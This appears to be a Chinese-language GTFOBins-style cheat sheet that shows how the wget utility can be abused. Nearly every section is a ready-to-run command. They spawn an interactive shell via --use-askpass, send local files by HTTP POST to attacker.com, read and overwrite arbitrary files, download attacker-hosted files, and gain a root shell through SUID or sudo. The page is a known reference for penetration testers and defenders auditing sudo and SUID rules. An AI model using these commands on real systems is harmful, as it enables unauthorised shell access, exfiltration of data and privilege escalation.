.. / wget

shell

用来生成一个交互式的系统shell。

• TF=$(mktemp)
  chmod +x $TF
  echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
  wget --use-askpass=$TF 0
  

file-upload

上传文件到外部。

• Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use --post-data to send hard-coded data.

  URL=http://attacker.com/
  LFILE=要发送的文件
  wget --post-file=$LFILE $URL
  

file-read

从文件中读取数据。

• The file to be read is treated as a list of URLs, one per line, which are actually fetched by wget. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.

  LFILE=要读取的文件路径
  wget -i $LFILE
  

file-write

将数据写入文件中。

• The data to be written is treated as a list of URLs, one per line, which are actually fetched by wget. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.

  LFILE=要写入的文件
  TF=$(mktemp)
  echo DATA > $TF
  wget -i $TF -o $LFILE
  

file-download

下载远程文件。

• Fetch a remote file via HTTP GET request.

  URL=http://attacker.com/file_to_get
  LFILE=file_to_save
  wget $URL -O $LFILE
  

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• TF=$(mktemp)
  chmod +x $TF
  echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
  ./wget --use-askpass=$TF 0
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• TF=$(mktemp)
  chmod +x $TF
  echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
  sudo wget --use-askpass=$TF 0